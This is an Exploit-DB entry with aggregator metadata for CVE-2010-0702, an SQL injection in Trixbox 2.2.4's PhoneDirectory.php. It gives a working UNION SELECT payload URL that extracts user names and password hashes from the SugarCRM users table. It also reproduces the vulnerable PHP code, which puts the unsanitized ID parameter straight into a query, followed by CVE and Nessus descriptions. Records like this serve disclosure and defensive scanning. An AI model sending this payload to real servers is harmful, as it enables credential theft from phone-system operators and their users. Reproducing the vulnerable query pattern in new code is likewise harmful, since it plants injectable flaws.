ID EDB-ID:11508 Type exploitdb Reporter NorSlacker Modified 2010-02-19T00:00:00
Description
Trixbox PhonecDirectory.php SQL Injection. CVE-2010-0702. Webapps exploit for php platform
# Software Link: http://trixbox.org/downloads
# Version: 2.2.4
# Code :
http://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION]
Example (Grab users / password hashes from sugarcrm)
http://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id
PhoneDirectory.php vulnerable code:
# If the variable "ID" is passed in through the GET string, then display
# extension, phone number and cell phone number for that record with the dial
# key functionality
if ($ID) {
$PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";
$Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other ";
$Query .= "FROM contacts WHERE id = '$ID' ";
$Query .= "ORDER BY last_name ";
$SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);
...
}
#norslacker [at] gmail [dot] com
{"hash": "28ebccc8412850579d4566fb49664197a37aebfb12cc1c40859e1bc37ee3092a", "id": "EDB-ID:11508", "lastseen": "2016-02-01T14:27:43", "viewCount": 1, "bulletinFamily": "exploit", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/11508/", "description": "Trixbox PhonecDirectory.php SQL Injection. CVE-2010-0702. Webapps exploit for php platform", "title": "Trixbox 2.2.4 - PhonecDirectory.php SQL Injection", "sourceData": "# Software Link: http://trixbox.org/downloads\r\n# Version: 2.2.4\r\n# Code : \r\nhttp://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION]\r\n\r\nExample (Grab users / password hashes from sugarcrm) \r\nhttp://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id\r\n\r\n\r\nPhoneDirectory.php vulnerable code:\r\n# If the variable \"ID\" is passed in through the GET string, then display\r\n# extension, phone number and cell phone number for that record with the dial\r\n# key functionality\r\nif ($ID) {\r\n $PersonDirectoryListing = \"<CiscoIPPhoneDirectory>\\n\";\r\n\r\n $Query = \"SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other \";\r\n $Query .= \"FROM contacts WHERE id = '$ID' \";\r\n $Query .= \"ORDER BY last_name \";\r\n $SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);\r\n\r\n ...\r\n\r\n}\r\n\r\n#norslacker [at] gmail [dot] com", "objectVersion": "1.0", "cvelist": ["CVE-2010-0702"], "published": "2010-02-19T00:00:00", "osvdbidlist": ["62572"], "references": [], "reporter": "NorSlacker", "modified": "2010-02-19T00:00:00", "href": "https://www.exploit-db.com/exploits/11508/"}
{"result": {"cve": [{"id": "CVE-2010-0702", "type": "cve", "title": "CVE-2010-0702", "description": "SQL injection vulnerability in cisco/services/PhonecDirectory.php in Fonality Trixbox 2.2.4 allows remote attackers to execute arbitrary SQL commands via the ID parameter.", "published": "2010-02-23T15:30:01", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0702", "cvelist": ["CVE-2010-0702"], "lastseen": "2017-08-17T11:14:43"}], "nessus": [{"id": "TRIXBOX_CISCO_PHONEDIRECTORY_ID_SQLI.NASL", "type": "nessus", "title": "trixbox Cisco Phone Services PhoneDirectory.php ID Parameter SQL Injection", "description": "The version of the Cisco Phone Services phone directory script ('cisco/services/PhoneDirectory.php') installed as part of the web interface for trixbox (or Asterisk@Home, as it was formerly known) and hosted on the remote web server fails to sanitize input to the 'ID' parameter before using it in a database query.\n\nProvided PHP's 'magic_quotes_gpc' setting is disabled, an unauthenticated, remote attacker can leverage this issue to manipulate SQL queries and, for example, uncover sensitive information from the associated database, read arbitrary files, or execute arbitrary PHP code.", "published": "2010-02-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=44875", "cvelist": ["CVE-2010-0702"], "lastseen": "2017-10-29T13:42:25"}]}}